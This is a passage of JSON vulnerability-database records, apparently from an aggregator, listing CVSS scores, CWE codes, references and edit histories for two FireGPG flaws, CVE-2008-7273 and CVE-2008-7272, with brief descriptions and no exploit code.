{"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "enchantments": {"dependencies": {"modified": "2020-12-09T19:28:28", "references": [], "rev": 2}, "score": {"modified": "2020-12-09T19:28:28", "rev": 2, "value": 1.2, "vector": "NONE"}}, "extraReferences": [], "hash": "3f2537e658f4240fe6f7df8e451ce685d2ca8ba79fbda529c1842e690c507e37", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-12-09T19:28:28", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 76}, "differentElements": ["extraReferences"], "edition": 7, "lastseen": "2020-12-09T19:28:28"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-10-03T11:51:06", "references": [], "rev": 2}, "score": {"modified": "2020-10-03T11:51:06", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "3f49259ae0555553bcbf3433a53f5984d6de287f6d865e78b449bda3b88b8ea7", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-10-03T11:51:06", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 72}, "differentElements": ["affectedSoftware"], "edition": 5, "lastseen": "2020-10-03T11:51:06"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "enchantments": {"dependencies": {"modified": "2021-02-02T05:35:21", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T05:35:21", "rev": 2, "value": 1.2, "vector": "NONE"}}, "extraReferences": [{"name": "https://www.openwall.com/lists/oss-security/2011/01/14/2", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://www.openwall.com/lists/oss-security/2011/01/14/2"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://security-tracker.debian.org/tracker/CVE-2008-7273", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7273"}], "hash": "5b731cb69531a1a4f440c98e6086aef32b59d25a21b3e795f6d21cdd0acb5966", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "85fdbb6779c8f53457b03e4617cac1fd", "key": "extraReferences"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "immutableFields": [], "lastseen": "2021-02-02T05:35:21", "modified": "2019-11-20T15:56:00", "objectVersion": "1.5", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 78}, "different_elements": ["cpeConfiguration"], "edition": 8, "lastseen": "2021-02-02T05:35:21"}], "edition": 9, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "2323c5f10ea99bff6a3fd88adbf7723c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "b37293c28011cded7e6cea212cc908fa"}, {"key": "cvelist", "hash": "9c6958cd5dd022a438c0a93346bb7717"}, {"key": "cvss", "hash": "6f6410364e4cee78bd47ed1fc3d8dd5b"}, {"key": "cvss2", "hash": "a6adb76bd2d2e833d4aee455da4b36c3"}, {"key": "cvss3", "hash": "beb519effad5780952ea4ce1697a49ad"}, {"key": "cwe", "hash": "c92f044c94e4360fec268c45081f3bc6"}, {"key": "description", "hash": "f427291f843f1948956af8f0777cb86f"}, {"key": "extraReferences", "hash": "85fdbb6779c8f53457b03e4617cac1fd"}, {"key": "href", "hash": "b066b40875680d07f9f9912048360029"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "368a4092894f1320c5eb8d6f1746c872"}, {"key": "published", "hash": "d1c394bb6e6939e65900ac8652bcb35f"}, {"key": "references", "hash": "d613e2c86955266b0d3e0b9be74eae16"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "5a3d95049ed4485340188fd46566963d"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "d695debc34a1657f10acd9dd2989cff4ec01e7bd03c81d546ca7db279f9ade48", "viewCount": 85, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-21T20:41:43", "rev": 2}, "score": {"value": 1.2, "vector": "NONE", "modified": "2021-04-21T20:41:43", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": [], "cwe": ["CWE-59"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://www.openwall.com/lists/oss-security/2011/01/14/2", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://www.openwall.com/lists/oss-security/2011/01/14/2"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://security-tracker.debian.org/tracker/CVE-2008-7273", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7273"}], "immutableFields": []}, {"id": "CVE-2008-7272", "bulletinFamily": "NVD", "title": "CVE-2008-7272", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "published": "2019-11-08T00:15:00", "modified": "2020-02-10T21:16:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "reporter": "cve@mitre.org", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "cvelist": ["CVE-2008-7272"], "type": "cve", "lastseen": "2021-04-21T20:41:43", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T13:59:22", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T13:59:22", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "f6701a04d3477e440e72324b648d7646a2f9466e07e83e341707bb314aec84a0", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "a0acab3127efc281e78e28b6a414532c", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-09-21T13:59:22", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 10}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T13:59:22"}, {"bulletin": {"affectedSoftware": [{"name": "getfiregpg firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-11T14:25:16", "references": [], "rev": 2}, "score": {"modified": "2020-02-11T14:25:16", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "a5439a88032d0d96d6b3b175c5bb2652a08a5ac9dd8565abd675e989e312c52e", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "c78a0c9b48c95bd2d49fb402de9ce674", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "d2db9f7acf8121ca4d72b70e2934db08", "key": "affectedSoftware"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-02-11T14:25:16", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 10}, "differentElements": ["cvss3", "cpe", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-11T14:25:16"}, {"bulletin": {"affectedSoftware": [{"name": "getfiregpg firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user?s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users?s private key.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-11-15T19:55:37", "references": []}, "score": {"modified": "2019-11-15T19:55:37", "value": 2.4, "vector": "NONE"}}, "hash": "05a389bab8cb239109f07a53e4f0a9c76cc24d31548b23dfad15c1385b48f5a5", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "b0552313c96be75e9ec1c10adb56b096", "key": "modified"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "240c2c1dd6f5cc5cbeb07774547c6c2b", "key": "description"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "c78a0c9b48c95bd2d49fb402de9ce674", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "d2db9f7acf8121ca4d72b70e2934db08", "key": "affectedSoftware"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2019-11-15T19:55:37", "modified": "2019-11-14T14:28:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 2}, "differentElements": ["description", "modified"], "edition": 2, "lastseen": "2019-11-15T19:55:37"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": 